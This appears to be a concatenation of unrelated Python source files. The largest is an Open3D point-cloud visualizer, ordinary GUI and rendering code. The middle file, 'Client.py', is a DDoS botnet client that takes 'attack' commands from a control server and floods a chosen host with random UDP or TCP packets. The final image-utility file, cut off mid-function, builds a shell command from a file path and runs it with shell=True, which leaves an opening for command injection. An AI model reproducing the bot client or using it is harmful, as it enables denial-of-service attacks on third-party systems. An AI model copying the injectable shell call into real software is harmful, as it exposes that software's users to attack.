grid = gui.VGrid(2)
v.add_child(grid)
self._slider = gui.Slider(gui.Slider.INT)
self._slider.set_limits(0, len(self._objects.data_names))
self._slider.set_on_value_changed(self._on_animation_slider_changed)
grid.add_child(gui.Label("Index"))
grid.add_child(self._slider)
self._slider_current = gui.Label("")
grid.add_child(gui.Label("Showing"))
grid.add_child(self._slider_current)
v.add_fixed(em)
self._play = gui.Button("Play")
self._play.horizontal_padding_em = 0.5
self._play.vertical_padding_em = 0
self._play.set_on_clicked(self._on_start_animation)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._play)
h.add_stretch()
v.add_child(h)
self._panel.add_child(model)
# Coloring
properties = gui.CollapsableVert("Properties", 0, indented_margins)
grid = gui.VGrid(2, 0.25 * em)
# ... data source
self._datasource_combobox = gui.Combobox()
self._datasource_combobox.set_on_selection_changed(
self._on_datasource_changed)
self._colormap_channel = gui.Combobox()
self._colormap_channel.add_item("0")
self._colormap_channel.set_on_selection_changed(
self._on_channel_changed)
h = gui.Horiz()
h.add_child(self._datasource_combobox)
h.add_fixed(em)
h.add_child(gui.Label("Index"))
h.add_child(self._colormap_channel)
grid.add_child(gui.Label("Data"))
grid.add_child(h)
# ... shader
self._shader = gui.Combobox()
self._shader.add_item(self.SOLID_NAME)
self._shader.add_item(self.LABELS_NAME)
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.COLOR_NAME)
self._colormaps[self.RAINBOW_NAME] = Colormap.make_rainbow()
self._colormaps[self.GREYSCALE_NAME] = Colormap.make_greyscale()
self._shader.selected_index = 0
self._shader.set_on_selection_changed(self._on_shader_changed)
grid.add_child(gui.Label("Shader"))
grid.add_child(self._shader)
properties.add_child(grid)
# ... shader panels
self._shader_panels = gui.StackedWidget()
panel_idx = 0
# ... sub-panel: single color
self._color_panel = gui.Vert()
self._shader_panels.add_child(self._color_panel)
self._shadername2panelidx[self.SOLID_NAME] = panel_idx
panel_idx += 1
self._color = gui.ColorEdit()
self._color.color_value = gui.Color(0.5, 0.5, 0.5)
self._color.set_on_value_changed(self._on_shader_color_changed)
h = gui.Horiz()
h.add_child(gui.Label("Color"))
h.add_child(self._color)
self._color_panel.add_child(h)
# ... sub-panel: labels
self._labels_panel = gui.Vert()
self._shader_panels.add_child(self._labels_panel)
self._shadername2panelidx[self.LABELS_NAME] = panel_idx
panel_idx += 1
self._label_edit = self.LabelLUTEdit()
self._label_edit.set_on_changed(self._on_labels_changed)
self._labels_panel.add_child(gui.Label("Labels"))
self._labels_panel.add_child(self._label_edit.widget)
# ... sub-panel: colormap
self._colormap_panel = gui.Vert()
self._shader_panels.add_child(self._colormap_panel)
self._shadername2panelidx[self.RAINBOW_NAME] = panel_idx
self._shadername2panelidx[self.GREYSCALE_NAME] = panel_idx
panel_idx += 1
self._colormap_edit = self.ColormapEdit(self.window, em)
self._colormap_edit.set_on_changed(self._on_colormap_changed)
self._colormap_panel.add_child(self._colormap_edit.widget)
# ... sub-panel: RGB
self._rgb_panel = gui.Vert()
self._shader_panels.add_child(self._rgb_panel)
self._shadername2panelidx[self.COLOR_NAME] = panel_idx
panel_idx += 1
self._rgb_combo = gui.Combobox()
self._rgb_combo.add_item("255")
self._rgb_combo.add_item("1.0")
self._rgb_combo.set_on_selection_changed(self._on_rgb_multiplier)
h = gui.Horiz(0.5 * em)
h.add_child(gui.Label("Max value"))
h.add_child(self._rgb_combo)
self._rgb_panel.add_child(h)
properties.add_fixed(em)
properties.add_child(self._shader_panels)
self._panel.add_child(properties)
# Populate tree, etc.
for name in self._objects.data_names:
self._add_tree_name(name)
self._update_datasource_combobox()
"""Set the LUT for a specific attribute.
**Args:**
attr_name: The attribute name as string.
lut: The LabelLUT object that should be updated.
"""
def set_lut(self, attr_name, lut):
self._attrname2lut[attr_name] = lut
"""Set up camera for visualization"""
def setup_camera(self):
selected_names = self._get_selected_names()
selected_bounds = [
self._objects.calc_bounds_for(n) for n in selected_names
]
min_val = [1e30, 1e30, 1e30]
max_val = [-1e30, -1e30, -1e30]
for b in selected_bounds:
for i in range(0, 3):
min_val[i] = min(min_val[i], b[0][i])
max_val[i] = max(max_val[i], b[1][i])
bounds = o3d.geometry.AxisAlignedBoundingBox(min_val, max_val)
self._3d.setup_camera(60, bounds, bounds.get_center())
"""Show geometry for a given node."""
def show_geometries_under(self, name, show):
prefix = name
for (n, node) in self._name2treenode.items():
if n.startswith(prefix):
self._3d.scene.show_geometry(n, show)
node.checkbox.checked = show
self._3d.force_redraw()
def _add_tree_name(self, name, is_geometry=True):
names = name.split("/")
parent = self._dataset.get_root_item()
for i in range(0, len(names) - 1):
n = "/".join(names[:i + 1]) + "/"
if n in self._name2treeid:
parent = self._name2treeid[n]
else:
def on_parent_checked(checked):
self.show_geometries_under(n, checked)
cell = gui.CheckableTextTreeCell(n, True, on_parent_checked)
parent = self._dataset.add_item(parent, cell)
self._name2treenode[n] = cell
self._name2treeid[n] = parent
self._treeid2name[parent] = n
def on_checked(checked):
self._3d.scene.show_geometry(name, checked)
if self._is_tree_name_geometry(name):
# available attrs could change
self._update_datasource_combobox()
self._update_bounding_boxes()
self._3d.force_redraw()
cell = gui.CheckableTextTreeCell(names[-1], True, on_checked)
if is_geometry:
cell.label.text_color = gui.Color(1.0, 0.0, 0.0, 1.0)
node = self._dataset.add_item(parent, cell)
self._name2treenode[name] = cell
self._treeid2name[node] = name
self._slider.set_limits(0, len(self._objects.data_names) - 1)
if len(self._objects.data_names) == 1:
self._slider_current.text = name
def _load_geometry(self, name, ui_done_callback):
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window, 2)
progress_dlg.set_text("Loading " + name + "...")
def load_thread():
result = self._objects.load(name)
progress_dlg.post_update("Loading " + name + "...")
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _load_geometries(self, names, ui_done_callback):
# Progress has: len(names) items + ui_done_callback
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window,
len(names) + 1)
progress_dlg.set_text("Loading " + names[0] + "...")
def load_thread():
for i in range(0, len(names)):
result = self._objects.load(names[i], True)
if i + 1 < len(names):
text = "Loading " + names[i + 1] + "..."
else:
text = "Creating GPU objects..."
progress_dlg.post_update(text)
if result:
self._name2treenode[names[i]].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
else:
break
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _update_geometry(self, check_unloaded=False):
if check_unloaded:
for name in self._objects.data_names:
if not self._objects.is_loaded(name):
self._3d.scene.remove_geometry(name)
material = self._get_material()
for n, tcloud in self._objects.tclouds.items():
self._update_point_cloud(n, tcloud, material)
if not tcloud.is_empty():
self._name2treenode[n].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
if self._3d.scene.has_geometry(n):
self._3d.scene.modify_geometry_material(n, material)
else:
self._name2treenode[n].label.text_color = gui.Color(
1.0, 0.0, 0.0, 1.0)
self._name2treenode[n].checkbox.checked = False
self._3d.force_redraw()
def _update_point_cloud(self, name, tcloud, material):
if self._dont_update_geometry:
return
if tcloud.is_empty():
return
attr_name = self._datasource_combobox.selected_text
attr = None
flag = 0
attr = self._objects.get_attr(name, attr_name)
# Update scalar values
if attr is not None:
if len(attr.shape) == 1:
scalar = attr
else:
channel = max(0, self._colormap_channel.selected_index)
scalar = attr[:, channel]
else:
shape = [len(tcloud.point["points"].numpy())]
scalar = np.zeros(shape, dtype='float32')
tcloud.point["__visualization_scalar"] = Visualizer._make_tcloud_array(
scalar)
flag |= rendering.Scene.UPDATE_UV0_FLAG
# Update RGB values
if attr is not None and (len(attr.shape) == 2 and attr.shape[1] >= 3):
max_val = float(self._rgb_combo.selected_text)
if max_val <= 0:
max_val = 255.0
colors = attr[:, [0, 1, 2]] * (1.0 / max_val)
tcloud.point["colors"] = Visualizer._make_tcloud_array(colors)
flag |= rendering.Scene.UPDATE_COLORS_FLAG
# Update geometry
if self._3d.scene.scene.has_geometry(name):
self._3d.scene.scene.update_geometry(name, tcloud, flag)
else:
self._3d.scene.add_geometry(name, tcloud, material)
node = self._name2treenode[name]
if node is not None:
self._3d.scene.show_geometry(name, node.checkbox.checked)
def _get_material(self):
self._update_gradient()
material = rendering.Material()
if self._shader.selected_text == self.SOLID_NAME:
material.shader = "unlitSolidColor"
c = self._color.color_value
material.base_color = [c.red, c.green, c.blue, 1.0]
elif self._shader.selected_text == self.COLOR_NAME:
material.shader = "defaultUnlit"
material.base_color = [1.0, 1.0, 1.0, 1.0]
else:
material.shader = "unlitGradient"
material.gradient = self._gradient
material.scalar_min = self._scalar_min
material.scalar_max = self._scalar_max
return material
def _update_bounding_boxes(self, animation_frame=None):
if len(self._attrname2lut) == 1:
# Can't do dict.values()[0], so have to iterate over the 1 element
for v in self._attrname2lut.values():
lut = v
elif "labels" in self._attrname2lut:
lut = self._attrname2lut["labels"]
elif "label" in self._attrname2lut:
lut = self._attrname2lut["label"]
else:
lut = None
mat = rendering.Material()
mat.shader = "unlitLine"
mat.line_width = 2 * self.window.scaling
if self._consolidate_bounding_boxes:
name = Model.bounding_box_prefix.split("/")[0]
boxes = []
# When consolidated we assume bbox_data.name is the geometry name.
if animation_frame is None:
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name in self._name2treenode and self._name2treenode[
bbox_data.name].checkbox.checked:
boxes += bbox_data.boxes
else:
geom_name = self._animation_frames[animation_frame]
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name == geom_name:
boxes = bbox_data.boxes
break
self._3d.scene.remove_geometry(name)
if len(boxes) > 0:
lines = BoundingBox3D.create_lines(boxes, lut)
self._3d.scene.add_geometry(name, lines, mat)
if name not in self._name2treenode:
self._add_tree_name(name, is_geometry=False)
self._3d.force_redraw()
else:
# Don't run this more than once if we aren't consolidating,
# because nothing will change.
if len(self._objects.bounding_box_data) > 0:
if self._objects.bounding_box_data[
0].name in self._name2treenode:
return
for bbox_data in self._objects.bounding_box_data:
lines = BoundingBox3D.create_lines(bbox_data.boxes, lut)
self._3d.scene.add_geometry(bbox_data.name, lines, mat)
for bbox_data in self._objects.bounding_box_data:
self._add_tree_name(bbox_data.name, is_geometry=False)
self._3d.force_redraw()
def _update_gradient(self):
if self._shader.selected_text == self.LABELS_NAME:
colors = self._label_edit.get_colors()
n = float(len(colors) - 1)
if n >= 1:
self._gradient.points = [
rendering.Gradient.Point(
float(i) / n, [
colors[i][0], colors[i][1], colors[i][2],
colors[i][3]
]) for i in range(0, len(colors))
]
else:
self._gradient.points = [
rendering.Gradient.Point(0.0, [1.0, 0.0, 1.0, 1.0])
]
self._gradient.mode = rendering.Gradient.LUT
else:
cmap = self._colormaps.get(self._shader.selected_text)
if cmap is not None:
self._gradient.points = [
rendering.Gradient.Point(
p.value, [p.color[0], p.color[1], p.color[2], 1.0])
for p in cmap.points
]
self._gradient.mode = rendering.Gradient.GRADIENT
def _update_geometry_colors(self):
material = self._get_material()
for name, tcloud in self._objects.tclouds.items():
if not tcloud.is_empty() and self._3d.scene.has_geometry(name):
self._3d.scene.modify_geometry_material(name, material)
self._3d.force_redraw()
def _update_datasource_combobox(self):
current = self._datasource_combobox.selected_text
self._datasource_combobox.clear_items()
available_attrs = self._get_available_attrs()
for attr_name in available_attrs:
self._datasource_combobox.add_item(attr_name)
if current in available_attrs:
self._datasource_combobox.selected_text = current
elif len(available_attrs) > 0:
self._datasource_combobox.selected_text = available_attrs[0]
else:
# If no attributes, two possibilities:
# 1) no geometries are selected: don't change anything
# 2) geometries are selected: color solid
has_checked = False
for n, node in self._name2treenode.items():
if node.checkbox.checked and self._is_tree_name_geometry(n):
has_checked = True
break
if has_checked:
self._set_shader(self.SOLID_NAME)
def _update_shaders_combobox(self):
current_attr = self._datasource_combobox.selected_text
current_shader = self._shader.selected_text
has_lut = (current_attr in self._attrname2lut)
is_scalar = True
selected_names = self._get_selected_names()
if len(selected_names) > 0 and len(
self._objects.get_attr_shape(selected_names[0],
current_attr)) > 1:
is_scalar = False
self._shader.clear_items()
if not is_scalar:
self._shader.add_item(self.COLOR_NAME)
if has_lut:
self._shader.add_item(self.LABELS_NAME)
self._label_edit.set_labels(self._attrname2lut[current_attr])
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.SOLID_NAME)
if current_shader == self.LABELS_NAME and has_lut:
self._set_shader(self.LABELS_NAME)
elif is_scalar:
self._set_shader(self.RAINBOW_NAME)
def _update_attr_range(self):
attr_name = self._datasource_combobox.selected_text
current_channel = self._colormap_channel.selected_index
self._scalar_min, self._scalar_max = self._objects.get_attr_minmax(
attr_name, current_channel)
if self._shader.selected_text in self._colormaps:
cmap = self._colormaps[self._shader.selected_text]
self._colormap_edit.update(
cmap, self._scalar_min, self._scalar_max)
def _set_shader(self, shader_name, force_update=False):
# Disable channel if we are using a vector shader. Always do this to
# ensure that the UI is consistent.
if shader_name == Visualizer.COLOR_NAME:
self._colormap_channel.enabled = False
else:
self._colormap_channel.enabled = True
if shader_name == self._shader.selected_text and not force_update:
return
self._shader.selected_text = shader_name
idx = self._shadername2panelidx[self._shader.selected_text]
self._shader_panels.selected_index = idx
if shader_name in self._colormaps:
cmap = self._colormaps[shader_name]
self._colormap_edit.update(
cmap, self._scalar_min, self._scalar_max)
self._update_geometry_colors()
def _on_layout(self, theme):
frame = self.window.content_rect
em = theme.font_size
panel_width = 20 * em
panel_rect = gui.Rect(frame.get_right() - panel_width, frame.y,
panel_width, frame.height - frame.y)
self._panel.frame = panel_rect
self._3d.frame = gui.Rect(frame.x, frame.y, panel_rect.x - frame.x,
frame.height - frame.y)
def _on_arcball_mode(self):
self._3d.set_view_controls(gui.SceneWidget.ROTATE_CAMERA)
def _on_fly_mode(self):
self._3d.set_view_controls(gui.SceneWidget.FLY)
def _on_reset_camera(self):
self.setup_camera()
def _on_dataset_selection_changed(self, item):
name = self._treeid2name[item]
if not self._is_tree_name_geometry(name):
return
def ui_callback():
self._update_attr_range()
self._update_geometry(check_unloaded=True)
self._update_bounding_boxes()
if not self._objects.is_loaded(name):
self._load_geometry(name, ui_callback)
def _on_display_tab_changed(self, index):
if index == 1:
self._animation_frames = self._get_selected_names()
self._slider.set_limits(0, len(self._animation_frames) - 1)
self._on_animation_slider_changed(self._slider.int_value)
# _on_animation_slider_changed() calls _update_bounding_boxes()
else:
for name, node in self._name2treenode.items():
self._3d.scene.show_geometry(name, node.checkbox.checked)
self._update_bounding_boxes()
def _on_animation_slider_changed(self, new_value):
idx = int(new_value)
for i in range(0, len(self._animation_frames)):
self._3d.scene.show_geometry(self._animation_frames[i], (i == idx))
self._update_bounding_boxes(animation_frame=idx)
self._3d.force_redraw()
self._slider_current.text = self._animation_frames[idx]
r = self._slider_current.frame
self._slider_current.frame = gui.Rect(r.x, r.y,
self._slider.frame.get_right(),
r.height)
def _on_start_animation(self):
def on_tick():
return self._on_animate()
self._play.text = "Stop"
self._play.set_on_clicked(self._on_stop_animation)
self._last_animation_time = 0.0
self.window.set_on_tick_event(on_tick)
def _on_animate(self):
now = time.time()
if now >= self._last_animation_time + self._animation_delay_secs:
idx = (self._slider.int_value + 1) % len(self._animation_frames)
self._slider.int_value = idx
self._on_animation_slider_changed(idx)
self._last_animation_time = now
return True
return False
def _on_stop_animation(self):
self.window.set_on_tick_event(None)
self._play.text = "Play"
self._play.set_on_clicked(self._on_start_animation)
def _on_bgcolor_changed(self, new_color):
bg_color = [
new_color.red, new_color.green, new_color.blue, new_color.alpha
]
self._3d.scene.set_background(bg_color)
self._3d.force_redraw()
def _on_datasource_changed(self, attr_name, idx):
selected_names = self._get_selected_names()
n_channels = 1
if len(selected_names) > 0:
shape = self._objects.get_attr_shape(selected_names[0], attr_name)
if len(shape) <= 1:
n_channels = 1
else:
n_channels = max(1, shape[1])
current_channel = max(0, self._colormap_channel.selected_index)
current_channel = min(n_channels - 1, current_channel)
self._colormap_channel.clear_items()
for i in range(0, n_channels):
self._colormap_channel.add_item(str(i))
self._colormap_channel.selected_index = current_channel
self._update_attr_range()
self._update_shaders_combobox()
# Try to intelligently pick a shader.
current_shader = self._shader.selected_text
if current_shader == Visualizer.SOLID_NAME:
pass
elif attr_name in self._attrname2lut:
self._set_shader(Visualizer.LABELS_NAME)
elif attr_name == "colors":
self._set_shader(Visualizer.COLOR_NAME)
elif n_channels >= 3:
self._set_shader(Visualizer.RAINBOW_NAME)
elif current_shader == Visualizer.COLOR_NAME: # vector -> scalar
self._set_shader(Visualizer.RAINBOW_NAME)
else: # changing from one scalar to another, don't change
pass
self._update_geometry()
def _on_channel_changed(self, name, idx):
self._update_attr_range()
self._update_geometry() # need to recompute scalars array
def _on_shader_changed(self, name, idx):
# _shader.current_text is already name, so we need to force an update
self._set_shader(name, force_update=True)
def _on_shader_color_changed(self, color):
self._update_geometry_colors()
def _on_labels_changed(self):
self._update_geometry_colors()
def _on_colormap_changed(self):
self._colormaps[
self._shader.selected_text] = self._colormap_edit.colormap
self._update_geometry_colors()
def _on_rgb_multiplier(self, text, idx):
self._update_geometry()
def _get_selected_names(self):
# Note that things like bounding boxes could be in the tree, and we
# do not want to include them in the list of things selected, even if
# they are checked.
selected_names = []
for n in self._objects.data_names:
if self._name2treenode[n].checkbox.checked:
selected_names.append(n)
return selected_names
def _get_available_attrs(self):
selected_names = self._get_selected_names()
return self._objects.get_available_attrs(selected_names)
def _is_tree_name_geometry(self, name):
return (name in self._objects.data_names)
@staticmethod
def _make_tcloud_array(np_array, copy=False):
if copy or not np_array.data.c_contiguous:
return o3d.core.Tensor(np_array)
else:
return o3d.core.Tensor.from_numpy(np_array)
def visualize_dataset(self,
dataset,
split,
label_lut=None,
indices=None,
width=1024,
height=768):
"""Visualize a dataset.
**Example:**
Minimal example for visualizing a dataset::
import open3d.ml.torch as ml3d # or open3d.ml.tf as ml3d
dataset = ml3d.datasets.SemanticKITTI(dataset_path='/path/to/SemanticKITTI/')
vis = ml3d.vis.Visualizer()
vis.visualize_dataset(dataset, 'all', indices=range(100))
**Args:**
dataset: The dataset to use for visualization.
split: The dataset split to be used, such as 'training'
indices: An iterable with a subset of the data points to visualize, such as [0,2,3,4].
width: The width of the visualization window.
height: The height of the visualization window.
"""
# Setup the labels
if label_lut is None:
lut = LabelLUT()
for key, val in (dataset.label_to_names.items()):
lut.add_label(val, key)
self.set_lut("labels", lut)
else:
self.set_lut("labels", label_lut)
self._consolidate_bounding_boxes = True
self._init_dataset(dataset, split, indices)
self._visualize("Open3D - " + dataset.name, width, height)
def visualize(self,
data,
lut=None,
bounding_boxes=None,
width=1024,
height=768):
"""Visualize a custom point cloud data.
**Example:**
Minimal example for visualizing a single point cloud with an
attribute::
import numpy as np
import open3d.ml.torch as ml3d
# or import open3d.ml.tf as ml3d
data = [ {
'name': 'my_point_cloud',
'points': np.random.rand(100,3).astype(np.float32),
'point_attr1': np.random.rand(100).astype(np.float32),
} ]
vis = ml3d.vis.Visualizer()
vis.visualize(data)
**Args:**
data: A list of dictionaries. Each dictionary is a point cloud with
attributes. Each dictionary must have the entries 'name' and
'points'. Points and point attributes can be passed as numpy
arrays, PyTorch tensors or TensorFlow tensors.
width: window width.
height: window height.
"""
self._init_data(data)
if lut is not None:
self.set_lut("labels", lut)
if bounding_boxes is not None:
prefix = Model.bounding_box_prefix
# Filament crashes if you have to many items, and anyway, hundreds
# of items is unweildy in a list. So combine items if we have too
# many.
group_size = int(math.floor(float(len(bounding_boxes)) / 100.0))
if group_size < 2:
box_data = [
Model.BoundingBoxData(prefix + str(bbox), [bbox])
for bbox in bounding_boxes
]
else:
box_data = []
current_group = []
n = len(bounding_boxes)
for i in range(0, n):
current_group.append(bounding_boxes[i])
if len(current_group) >= group_size or i == n - 1:
if i < n - 1:
name = prefix + "Boxes " + str(
i + 1 - group_size) + " - " + str(i)
else:
if len(current_group) > 1:
name = prefix + "Boxes " + str(
i + 1 - len(current_group)) + " - " + str(i)
else:
name = prefix + "Box " + str(i)
data = Model.BoundingBoxData(name, current_group)
box_data.append(data)
current_group = []
self._objects.bounding_box_data = box_data
self._visualize("Open3D", width, height)
def _visualize(self, title, width, height):
gui.Application.instance.initialize()
self._init_user_interface(title, width, height)
self._3d.scene.downsample_threshold = 400000
# Turn all the objects off except the first one
for name, node in self._name2treenode.items():
node.checkbox.checked = False
self._3d.scene.show_geometry(name, False)
for name in [self._objects.data_names[0]]:
self._name2treenode[name].checkbox.checked = True
self._3d.scene.show_geometry(name, True)
def on_done_ui():
# Add bounding boxes here: bounding boxes belonging to the dataset
# will not be loaded until now.
self._update_bounding_boxes()
self._update_datasource_combobox()
self._update_shaders_combobox()
# Display "colors" by default if available, "points" if not
available_attrs = self._get_available_attrs()
self._set_shader(self.SOLID_NAME, force_update=True)
if "colors" in available_attrs:
self._datasource_combobox.selected_text = "colors"
elif "points" in available_attrs:
self._datasource_combobox.selected_text = "points"
self._dont_update_geometry = True
self._on_datasource_changed(
self._datasource_combobox.selected_text,
self._datasource_combobox.selected_index)
self._update_geometry_colors()
self._dont_update_geometry = False
# _datasource_combobox was empty, now isn't, re-layout.
self.window.set_needs_layout()
self._update_geometry()
self.setup_camera()
self._load_geometries(self._objects.data_names, on_done_ui)
gui.Application.instance.run()
|
Client.py
|
import subprocess
import threading
import time
import socket
import os, sys, random
class Client():
send=0
run=False
def __init__(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host ,port= '127.0.0.1',9999
self.s.connect((host, port))
self.start()
def __ddos(self,*args):
def dos(*args):
t1=time.time()
host,port=args[1],args[a2]
if args[0] == "udp":s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bytes=random._urandom(10240)
s.connect((host, int(port)))
while True:
if not self.run:break
s.sendto(bytes, (host,int(port)))
self.send+=1
#print(str(send)+" Packets Sended Sucessful")
s.close()
print("run time {}".format(time.time()-t1))
for n in range(int(args[4])):
threading.Thread(target = dos,args=[*args]).start()
time.sleep(int(args[3]))
self.run=False
def start(self):
while True:
data = self.s.recv(1024)
data=data[:].decode("utf-8")
data=data.lower()
if "attack" in data:
self.s.send(str.encode("done"))
data=data.replace("attack ","")
data=data.split()
self.run=True
threading.Thread(target = self.__ddos,args=data).start()
elif "kill" in data:
self.run=False
self.s.send(str.encode("Server Stopped"))
elif "ping" in data:
self.s.send(str.encode("kong"))
else:self.s.send(str.encode("ERROR"))
if __name__ == '__main__':
def main():
try:
print("Connecting...")
Client()
except:
print("Failed.... 10 Second wait")
time.sleep(10)
main()
main()
|
image_utils__unused.py
|
import threading
from pathlib import Path
from uuid import uuid4
from base64 import b64encode
from traceback import print_exc
from subprocess import call
import os, shutil
import imageio
import cv2
import numpy as np
#####################
# Generic Functions #
#####################
from shared_utils import folder_utils
def base64_encoded_image(image_path):
with open(image_path, "rb") as image_file:
return b64encode(image_file.read()).decode()
def make_image_data(image_path):
return 'data:image/png;base64,' + base64_encoded_image(image_path)
def check_source_format(source_image):
# available format - 181
available_formats = ['.1sc', '.2', '.2fl', '.3', '.4', '.acff', '.afi', '.afm', '.aim', '.al3d', '.ali', '.am',
'.amiramesh', '.apl', '.arf', '.avi', '.bif', '.bin', '.bip', '.bmp', '.btf', '.c01',
'.cfg', '.ch5', '.cif', '.cr2', '.crw', '.csv', '.cxd', '.czi', '.dat', '.dcm', '.dib',
'.dicom', '.dm2', '.dm3', '.dm4', '.dti', '.dv', '.eps', '.epsi', '.exp', '.fdf', '.fff',
'.ffr', '.fits', '.flex', '.fli', '.frm', '.gel', '.gif', '.grey', '.h5', '.hdf', '.hdr',
'.hed', '.his', '.htd', '.html', '.hx', '.i2i', '.ics', '.ids', '.im3', '.img', '.ims',
'.inr', '.ipl', '.ipm', '.ipw', '.j2k', '.jp2', '.jpf', '.jpg', '.jpk', '.jpx', '.klb',
'.l2d', '.labels', '.lei', '.lif', '.liff', '.lim', '.lms', '.lsm', '.map', '.mdb',
'.mea', '.mnc', '.mng', '.mod', '.mov', '.mrc', '.mrcs', '.mrw', '.msr', '.mtb', '.mvd2',
'.naf', '.nd', '.nd2', '.ndpi', '.ndpis', '.nef', '.nhdr', '.nii', '.nii.gz', '.nrrd',
'.obf', '.obsep', '.oib', '.oif', '.oir', '.ome', '.ome.btf', '.ome.tf2', '.ome.tf8',
'.ome.tif', '.ome.tiff', '.ome.xml', '.par', '.pbm', '.pcoraw', '.pcx', '.pds', '.pgm',
'.pic', '.pict', '.png', '.pnl', '.ppm', '.pr3', '.ps', '.psd', '.qptiff', '.r3d', '.raw',
'.rcpnl', '.rec', '.res', '.scn', '.sdt', '.seq', '.sif', '.sld', '.sm2', '.sm3', '.spc',
'.spe', '.spi', '.st', '.stk', '.stp', '.svs', '.sxm', '.tf2', '.tf8', '.tfr', '.tga', '.tif',
'.tiff', '.tnb', '.top', '.txt', '.v', '.vff', '.vms', '.vsi', '.vws', '.wat', '.wlz', '.wpi',
'.xdce', '.xml', '.xqd', '.xqf', '.xv', '.xys', '.zfp', '.zfr', '.zvi']
_, file_extension = os.path.splitext(source_image.name)
try:
available_formats.index(file_extension.lower())
return True
except Exception:
print_exc()
return False
# Save the uploaded file to a cache dir.
def save_source_image(source_image):
dest_dir = folder_utils.get_cache_directory()
_, file_extension = os.path.splitext(source_image.name)
file_path = str(dest_dir.joinpath(uuid4().hex + file_extension))
with open(file_path, mode='wb') as destination:
for chunk in source_image.chunks():
destination.write(chunk)
return file_path
def convert_to_tiff(source_file):
dest_dir = folder_utils.get_cache_directory('converted')
file_name, _ = os.path.splitext(os.path.basename(source_file))
dest_file = str(dest_dir.joinpath(file_name + '.tiff'))
shell_script = f'gm convert {source_file} {dest_file}'
call(shell_script, shell=True)
return dest_file
def save_processing_file(raw_data):
dest_dir = folder_utils.get_cache_directory('raw_data')
file_path = str(dest_dir.joinpath(uuid4().hex + '.png'))
with open(file_path, mode='wb') as destination:
destination.write(raw_data)
return file_path
def save_image(image_array, scale, channel):
dest_dir = folder_utils.get_cache_directory('bioformats')
saved_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
image_size = image_array.shape
img = None
if len(image_size) == 2 and channel is not None:
r = channel['color']['r']
g = channel['color']['g']
b = channel['color']['b']
if r + g + b > 0:
x = np.array((r, g, b), dtype=np.uint8)
_image_array = image_array / scale
img = np.zeros(image_size + (3,))
img[..., 0] = _image_array * x[0]
img[..., 1] = _image_array * x[1]
img[..., 2] = _image_array * x[2]
imageio.imwrite(saved_file, img)
if img is None:
imageio.imwrite(saved_file, image_array)
return saved_file #, len(image_size) == 3 and image_size[2] == 3
def delete_file(file):
t = threading.Thread(target=delete_file_thread, args=[file], daemon=True)
t.start()
def delete_file_thread(file):
if os.path.exists(file):
os.remove(file)
else:
print("The file does not exist")
####################
# OpenCV Functions #
####################
# def split_channels(image_file, channels):
# origin_img = cv2.imread(image_file, 1)
# if len(origin_img.shape) == 3:
# height, width, _ = origin_img.shape[:3]
# else:
# height, width = origin_img.shape[:2]
# zeros = np.zeros((height, width), origin_img.dtype)
# # B, G, R
# blue_ch, green_ch, red_ch = cv2.split(origin_img)
# if channels == 'b':
# img = cv2.merge((blue_ch, zeros, zeros))
# elif channels == 'g':
# img = cv2.merge((zeros, green_ch, zeros))
# elif channels == 'r':
# img = cv2.merge((zeros, zeros, red_ch))
# elif channels == 'bg' or channels == 'gb':
# img = cv2.merge((blue_ch, green_ch, zeros))
# elif channels == 'br' or channels == 'rb':
# img = cv2.merge((blue_ch, zeros, red_ch))
# elif channels == 'gr' or channels == 'rg':
# img = cv2.merge((zeros, green_ch, red_ch))
# else:
# img = cv2.merge((blue_ch, green_ch, red_ch))
# dest_dir = get_cache_directory('channels')
# new_image_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
# cv2.imwrite(new_image_file, img)
# return new_image_file
def convert_to_gray(image_file, bits):
origin_img = cv2.imread(image_file)
img = cv2.cvtColor(origin_img, cv2.COLOR_BGR2GRAY)
if bits == '8':
img = map_uint16_to_uint8(map_uint16_to_uint8(img))
elif bits == '16':
img = map_uint16_to_uint8(img)
dest_dir = folder_utils.get_cache_directory('gray')
new_image_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
cv2.imwrite(new_image_file, img)
return new_image_file
def map_uint16_to_uint8(img, lower_bound=None, upper_bound=None):
if lower_bound is not None and not(0 <= lower_bound < 2**16):
raise ValueError(
'"lower_bound" must be in the range [0, 65535]')
if upper_bound is not None and not(0 <= upper_bound < 2**16):
raise ValueError(
'"upper_bound" must be in the range [0, 65535]')
if lower_bound is None:
lower_bound = np.min(img)
if upper_bound is None:
upper_bound = np.max(img)
if lower_bound >= upper_bound:
raise ValueError(
'"lower_bound" must be smaller than "upper_bound"')
lut = np.concatenate([
np.zeros(lower_bound, dtype=np.uint16),
np.linspace(0, 255, upper_bound - lower_bound).astype(np.uint16),
np.ones(2**16 - upper_bound, dtype=np.uint16) * 255
])
return lut[img].astype(np.uint8)
def change_image_parameter(image_file, brightness, contrast, gamma):
origin_img = cv2.imread(image_file)
brightness = map(brightness, -255, 255, -255, 255)
contrast = map(contrast, -127, 127, -127, 127)
if brightness != 0:
if brightness > 0:
shadow = brightness
highlight = 255
else:
shadow = 0
highlight = 255 + brightness
alpha_b = (highlight - shadow)/255
gamma_b = shadow
buf = cv2.addWeighted(origin_img, alpha_b, origin_img, 0, gamma_b)
else:
buf = origin_img.copy()
if contrast != 0:
